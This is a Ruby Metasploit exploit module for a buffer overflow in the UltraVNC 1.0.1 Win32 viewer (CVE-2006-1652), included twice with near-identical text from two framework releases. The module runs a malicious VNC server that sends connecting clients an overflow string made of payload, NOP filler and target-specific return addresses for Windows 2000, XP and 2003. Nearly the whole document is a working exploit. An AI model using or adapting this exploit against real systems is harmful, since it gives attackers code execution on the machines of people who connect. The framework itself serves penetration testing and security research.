==> metasploit-framework_4.17.17.orig.tar.gz: metasploit-framework-4.17.17/modules/exploits/windows/vnc/ultravnc_client.rb <==
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::TcpServer

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'UltraVNC 1.0.1 Client Buffer Overflow',
      'Description'    => %q{
        This module exploits a buffer overflow in UltraVNC Win32
        Viewer 1.0.1 Release.
      },
      'Author'         => 'MC',
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'CVE', '2006-1652' ],
          [ 'OSVDB', '24456' ],
          [ 'BID', '17378' ],
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'thread',
        },
      'Payload'        =>
        {
          'Space'    => 500,
          'BadChars' => "\x00",
          'MaxNops'  => 0,
          'StackAdjustment' => -3500,
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          [ 'Windows 2000 SP4 English',	{ 'Ret' => 0x7c2ec68b } ],
          [ 'Windows XP SP2 English',	{ 'Ret' => 0x77dc15c0 } ],
          [ 'Windows 2003 SP1 English',	{ 'Ret' => 0x76aa679b } ],
        ],
      'Privileged'     => false,
      'DisclosureDate' => 'Apr 4 2006',
      'DefaultTarget'  => 0))

    register_options(
      [
        OptPort.new('SRVPORT', [ true, "The VNCServer daemon port to listen on", 5900 ])
      ])
  end

  def on_client_connect(client)

    rfb = "RFB 003.006\n"

    client.put(rfb)
  end

  def on_client_data(client)
    return if ((p = regenerate_payload(client)) == nil)

    filler = make_nops(980 - payload.encoded.length)

    sploit =  "\x00\x00\x00\x00\x00\x00\x04\x06" + "Requires Ultr@VNC Authentication\n"
    sploit << payload.encoded + filler + [target.ret].pack('V')
    sploit << "PASSWORD" + [0xe8, -997].pack('CV')

    print_status("Sending #{sploit.length} bytes to #{client.getpeername}:#{client.peerport}...")
    client.put(sploit)

    handler
    service.close_client(client)
  end
end

==> metasploit-framework_6.1.27.orig.tar.gz: metasploit-framework-6.1.27/modules/exploits/windows/vnc/ultravnc_client.rb <==
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::TcpServer

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'UltraVNC 1.0.1 Client Buffer Overflow',
      'Description'    => %q{
        This module exploits a buffer overflow in UltraVNC Win32
        Viewer 1.0.1 Release.
      },
      'Author'         => 'MC',
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'CVE', '2006-1652' ],
          [ 'OSVDB', '24456' ],
          [ 'BID', '17378' ],
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'thread',
        },
      'Payload'        =>
        {
          'Space'    => 500,
          'BadChars' => "\x00",
          'MaxNops'  => 0,
          'StackAdjustment' => -3500,
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          [ 'Windows 2000 SP4 English',	{ 'Ret' => 0x7c2ec68b } ],
          [ 'Windows XP SP2 English',	{ 'Ret' => 0x77dc15c0 } ],
          [ 'Windows 2003 SP1 English',	{ 'Ret' => 0x76aa679b } ],
        ],
      'Privileged'     => false,
      'DisclosureDate' => '2006-04-04',
      'DefaultTarget'  => 0))

    register_options(
      [
        OptPort.new('SRVPORT', [ true, "The VNCServer daemon port to listen on", 5900 ])
      ])
  end

  def on_client_connect(client)

    rfb = "RFB 003.006\n"

    client.put(rfb)
  end

  def on_client_data(client)
    return if ((p = regenerate_payload(client)) == nil)

    filler = make_nops(980 - payload.encoded.length)

    sploit =  "\x00\x00\x00\x00\x00\x00\x04\x06" + "Requires Ultr@VNC Authentication\n"
    sploit << payload.encoded + filler + [target.ret].pack('V')
    sploit << "PASSWORD" + [0xe8, -997].pack('CV')

    print_status("Sending #{sploit.length} bytes to #{client.getpeername}:#{client.peerport}...")
    client.put(sploit)

    handler
    service.close_client(client)
  end
end
